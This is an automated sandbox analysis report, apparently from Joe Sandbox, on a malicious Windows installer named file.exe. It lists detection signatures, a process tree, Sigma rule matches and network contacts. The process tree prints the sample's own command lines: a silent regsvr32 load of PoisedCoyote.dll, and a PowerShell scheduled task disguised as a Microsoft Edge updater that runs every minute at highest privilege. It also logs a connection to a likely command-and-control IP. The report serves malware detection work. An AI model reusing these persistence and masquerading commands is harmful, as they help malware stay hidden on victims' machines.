
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559884
MD5: fecd099f9b8d9500d7199a1054397e3f
SHA1: 3df235780c9ad851474c20338e4921f5f2decaf7
SHA256: 96a60b6cde63794b637bce219083e7905560c626e68c00af1d99be451c8c3700
Tags: exe, user-Bitsight

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Powershell launch regsvr32
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FECD099F9B8D9500D7199A1054397E3F)
    • file.tmp (PID: 7508 cmdline: "C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe" MD5: 14C6FA8E50B4147075EB922BD0C8B28D)
      • cmd.exe (PID: 7528 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7576 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • file.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: FECD099F9B8D9500D7199A1054397E3F)
          • file.tmp (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: 14C6FA8E50B4147075EB922BD0C8B28D)
            • regsvr32.exe (PID: 7672 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 7688 cmdline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 7736 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 8100 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • regsvr32.exe (PID: 3152 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 1880 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7688, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7736, ProcessName: powershell.exe
Source: Network Connection; Author: Dmitriy Lifanov, oscd.community; Data: DestinationIp: 154.216.19.129, DestinationIsIpv6: false, DestinationPort: 58001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp, ParentProcessId: 7656, ParentProcessName: file.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ProcessId: 7672, ProcessName: regsvr32.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7688, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7736, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 7688, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }", ProcessId: 7736, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2694A0 BCryptGenRandom,SystemFunction036
Source: file.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp; Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Little Leg_is1
Source: unknown; HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB22B9F0 NetUserEnum,NetUserGetInfo,memcpy,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,LsaEnumerateLogonSessions,LsaFreeReturnBuffer,LsaGetLogonSessionData,memcmp,LsaFreeReturnBuffer,LsaFreeReturnBuffer,LsaFreeReturnBuffer,NetApiBufferFree,NetApiBufferFree,memcmp

Networking

Source: C:\Windows\System32\regsvr32.exe; Network Connect: 154.216.19.129 58001
Source: C:\Windows\System32\regsvr32.exe; Network Connect: 93.93.131.124 443
Source: global traffic; TCP traffic: 192.168.2.4:49736 -> 154.216.19.129:58001
Source: global traffic; HTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1; Host: the.earth.li; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 93.93.131.124
Source: Joe Sandbox View; ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; TCP traffic detected without corresponding DNS query: 154.216.19.129
Source: global traffic; DNS traffic detected: DNS query: the.earth.li
Source: regsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2089574907.0000000002945000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2324197266.00000000038C0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.c
Source: regsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGloba
Source: regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: regsvr32.exe, 00000008.00000003.1818287850.0000000002934000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2088977331.00000000033A4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2089574907.0000000002945000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E56000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.00000000038D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2324197266.00000000038C0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtC
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crtv
Source: regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: regsvr32.exe, 00000008.00000003.2090329426.0000000002829000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.1881087363.0000021F947D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E2FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.dr; String found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 00000009.00000002.1921586400.0000021FACAA5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.c
Source: file.exe, 00000000.00000003.1748510327.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748200530.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1749281885.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-DOVSB.tmp.6.dr, file.tmp.5.dr, file.tmp.0.dr; String found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 00000009.00000002.1881087363.0000021F945B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1964877701.000002148E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2098231476.000001C80E481000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/
Source: regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/q
Source: regsvr32.exe, 00000008.00000003.2088977331.0000000003351000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2020259374.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2321313066.0000000003881000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: file.tmp, 00000006.00000003.1789026333.00000000053A0000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp, is-D8FFC.tmp.6.dr; String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: powershell.exe, 00000011.00000002.2098231476.000001C80E6A8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1913116591.0000021FA4625000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2049496688.000002149E144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2266875056.000001C81E4F4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown; Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown; Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49739 -> 443
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB220B68 NtQuerySystemInformation
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB21DBC0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,VirtualQueryEx,RtlFreeHeap,GetProcessTimes
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB206890 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB216163: memcpy,CreateFileW,GetDiskFreeSpaceExW,DeviceIoControl,CloseHandle,CloseHandle,memcmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_00007FFD9B1D4FFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 14_2_00007FFD9B1F4DFB
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB21DBC0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2AFC30
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB20185D
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB20F280
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2AE2E0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB204760
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2A4B80
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB301A60
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2369D0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2049D4
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2049BA
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB201A43
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB27BA30
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2A7A30
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB206890
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB275950
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2E0010
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB20FE90
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB22A040
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB229E80
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2ABE80
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB208EC0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB21BEA0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB219F00
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB21ADA0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2B4DE0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB224C90
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2DDC60
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB22B3E0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB285450
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB301420
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB28F2D0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB22A320
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB22A1C0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2F31C0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2750C0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2060E0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB22D150
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2177B0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB25B670
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB21A660
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB2E86C0
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB225740
Source: C:\Windows\System32\regsvr32.exe; Code function: 16_2_00007FFDFB21B610
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2B861016_2_00007FFDFB2B8610
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB25B47016_2_00007FFDFB25B470
Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFDFB2EBA00 appears 51 times
Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFDFB2EB770 appears 48 times
Source: file.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.tmp.5.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.5.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-DOVSB.tmp.6.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-DOVSB.tmp.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-D8FFC.tmp.6.dr Static PE information: Number of sections : 11 > 10
